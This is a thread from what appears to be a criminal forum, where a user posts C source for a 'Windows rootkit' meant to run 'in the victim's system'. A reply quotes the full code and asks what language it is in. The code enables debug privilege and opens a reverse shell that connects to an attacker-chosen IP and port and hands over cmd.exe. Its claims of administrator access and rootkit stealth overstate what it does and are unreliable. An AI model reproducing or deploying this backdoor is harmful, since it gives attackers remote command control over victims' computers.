Welcome to the Off-Shore Club

The #1 Social Engineering Project in the world since 2004 !
Register

ROOTKIT WINDOWS V1.0

Gold

ROOT

ROOT

SENSE!
Verified Seller
Instructor
USDT(TRC-20)
$0.0
After compiling and running in the victim's system This rootkit :>
1- Creates a back door to enter
2-Administrator access
3- And Windows PowerShell access has the highest access

Code: 
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
//code by e1.coders
DWORD WINAPI BackdoorThread(LPVOID lpParam) {
    SOCKET sock;
    struct sockaddr_in server;
    WSADATA wsaData;

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        return 1;
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        WSACleanup();
        return 1;
    }

    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr("127.0.0.1");  // Replace with the desired IP address
    server.sin_port = htons(4444);  // Replace with the desired port number

    if (connect(sock, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR) {
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    char buffer[1024];
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sock;
    if (CreateProcess("cmd.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }

    closesocket(sock);
    WSACleanup();
    return 0;
}

BOOL ElevatePrivileges() {
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }

    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, 0, (PTOKEN_PRIVILEGES)NULL, 0)) {
        CloseHandle(hToken);
        return FALSE;
    }

    CloseHandle(hToken);
    return TRUE;
}

int main() {
    if (ElevatePrivileges()) {
        HANDLE hThread = CreateThread(NULL, 0, BackdoorThread, NULL, 0, NULL);
        if (hThread != NULL) {
            CloseHandle(hThread);
        }
    }

    return 0;
}
 
ROOT said:
After compiling and running in the victim's system This rootkit :>
1- Creates a back door to enter
2-Administrator access
3- And Windows PowerShell access has the highest access

Code: 
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
//code by e1.coders
DWORD WINAPI BackdoorThread(LPVOID lpParam) {
    SOCKET sock;
    struct sockaddr_in server;
    WSADATA wsaData;

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        return 1;
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        WSACleanup();
        return 1;
    }

    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr("127.0.0.1");  // Replace with the desired IP address
    server.sin_port = htons(4444);  // Replace with the desired port number

    if (connect(sock, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR) {
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    char buffer[1024];
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sock;
    if (CreateProcess("cmd.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }

    closesocket(sock);
    WSACleanup();
    return 0;
}

BOOL ElevatePrivileges() {
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }

    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, 0, (PTOKEN_PRIVILEGES)NULL, 0)) {
        CloseHandle(hToken);
        return FALSE;
    }

    CloseHandle(hToken);
    return TRUE;
}

int main() {
    if (ElevatePrivileges()) {
        HANDLE hThread = CreateThread(NULL, 0, BackdoorThread, NULL, 0, NULL);
        if (hThread != NULL) {
            CloseHandle(hThread);
        }
    }

    return 0;
}
Click to expand...
This is c or c++?
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Register

Log in

Already have an account? Log in here.

Friendly Disclaimer We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use RTM Escrow on Telegram
Gold
Mitalk.lat official Off Shore Club Chat

Gold

Best Vendors based on Vouches

Most trusted High deposit Sellers / Bulk Buyers

Most USDT(TRC-20)

CoinShift
CoinShift
$120,000.0 USDT(TRC-20)
Dogbyte
Dogbyte
$120,000.0 USDT(TRC-20)
PabloWire
PabloWire
$92,663.0 USDT(TRC-20)
Gr@bb!tor
Gr@bb!tor
$75,000.0 USDT(TRC-20)
Alexander
Alexander
$75,000.0 USDT(TRC-20)
LesterStash
LesterStash
$72,366.9 USDT(TRC-20)
Vitalik_Dark
Vitalik_Dark
$66,870.0 USDT(TRC-20)
MazeBank
MazeBank
$60,000.0 USDT(TRC-20)
CowBoy.exe
CowBoy.exe
$60,000.0 USDT(TRC-20)

Panel Title #1

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Panel Title #2

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Panel Title #3

  • YOUR LINK NAME
    •
  • YOUR LINK NAME
    •
  • YOUR LINK NAME
    •
  • YOUR LINK NAME
    •
  • YOUR LINK NAME
    •

    Panel Title #4

  • YOUR LINK NAME
    •
  • YOUR LINK NAME
    •
  • YOUR LINK NAME
    •
  • YOUR LINK NAME
    •
  • YOUR LINK NAME
    •
    Top